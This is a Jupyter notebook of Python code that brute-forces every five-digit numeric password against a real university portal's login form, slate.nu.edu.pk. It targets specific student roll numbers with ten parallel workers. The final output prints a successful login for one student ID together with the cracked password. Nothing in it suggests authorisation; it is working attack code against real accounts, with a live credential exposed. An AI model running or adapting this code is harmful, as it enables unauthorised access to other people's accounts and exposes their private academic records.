# Brute Force Algorithm

In [ ]:
!pip install requests
!pip install bs4

In [ ]:
import requests
from concurrent.futures import ProcessPoolExecutor
from itertools import product
from bs4 import BeautifulSoup
import multiprocessing

roll_number = "p200038"

# Generate all possible combinations of 5-digit codes using digits (0-9)
passwords = [''.join(map(str, combo)) for combo in product(range(10), repeat=5)]

login_successful = multiprocessing.Value('b', False)  # Variable to track successful login
lock = multiprocessing.Lock()  # Lock for synchronization

# Counter for tracking progress
progress_counter = multiprocessing.Value('i', 0)

def try_login(password):
    global login_successful, progress_counter
    session = requests.Session()

    login_url = "http://slate.nu.edu.pk/portal/xlogin"
    profile_url = "http://slate.nu.edu.pk/portal/site/~p200165"

    login_payload = {"eid": roll_number, "pw": password}

    # Make a POST request to login
    login_response = session.post(login_url, data=login_payload)

    # Check if login was successful based on the response URL and content
    if "http://slate.nu.edu.pk/portal" in login_response.url and "http://slate.nu.edu.pk/portal/relogin" not in login_response.url:
        # Additional check to ensure successful login
        profile_response = session.get(profile_url)
        soup = BeautifulSoup(profile_response.text, 'html.parser')
        h1_tag = soup.find('h1', text='Login Required')

        if not h1_tag:
            with lock:
                print(f"Login successful with: {roll_number}, {password}")
                login_successful.value = True

        # Increment progress counter
        with lock:
            progress_counter.value += 1
#             print(progress_counter)

        return True

    return False

def process_wrapper(password):
    # Use a wrapper function to catch exceptions
    try:
        return try_login(password)
    except Exception as e:
        print(f"Exception: {e}")
        return False

with ProcessPoolExecutor(max_workers=10) as executor:
    # Map the function to the list of passwords
    results = list(executor.map(process_wrapper, passwords))

# Check if any result is True
if any(results):
    print("Done")


In [2]:
import requests
from concurrent.futures import ProcessPoolExecutor
from itertools import product
from bs4 import BeautifulSoup
import multiprocessing

roll_number = "p200639"

# Generate all possible combinations of 5-digit codes using digits (0-9)
passwords = [''.join(map(str, combo)) for combo in product(range(10), repeat=5)]

login_successful = multiprocessing.Value('b', False)  # Variable to track successful login
lock = multiprocessing.Lock()  # Lock for synchronization

def try_login(password):
    global login_successful
    session = requests.Session()

    login_url = "http://slate.nu.edu.pk/portal/xlogin"
    profile_url = "http://slate.nu.edu.pk/portal/site/~p229252"

    login_payload = {"eid": roll_number, "pw": password}

    # Make a POST request to login
    login_response = session.post(login_url, data=login_payload)

    # Check if login was successful based on the response URL and content
    if "http://slate.nu.edu.pk/portal" in login_response.url and "http://slate.nu.edu.pk/portal/relogin" not in login_response.url:
        # Additional check to ensure successful login
        profile_response = session.get(profile_url)
        soup = BeautifulSoup(profile_response.text, 'html.parser')
        h1_tag = soup.find('h1', text='Login Required')

        if not h1_tag:
            with lock:
                print(f"Login successful with: {roll_number}, {password}")
                login_successful.value = True
            return True

    #     print(f"Login required for: {roll_number}, {password}. Trying next password.")
    return False

def process_wrapper(password):
    # Use a wrapper function to catch exceptions
    try:
        return try_login(password)
    except Exception as e:
        print(f"Exception: {e}")
        return False

with ProcessPoolExecutor(max_workers=10) as executor:
    # Map the function to the list of passwords
    results = list(executor.map(process_wrapper, passwords))

# Check if any result is True
if any(results):
    print("Done")


Login successful with: p200639, 63966
Done
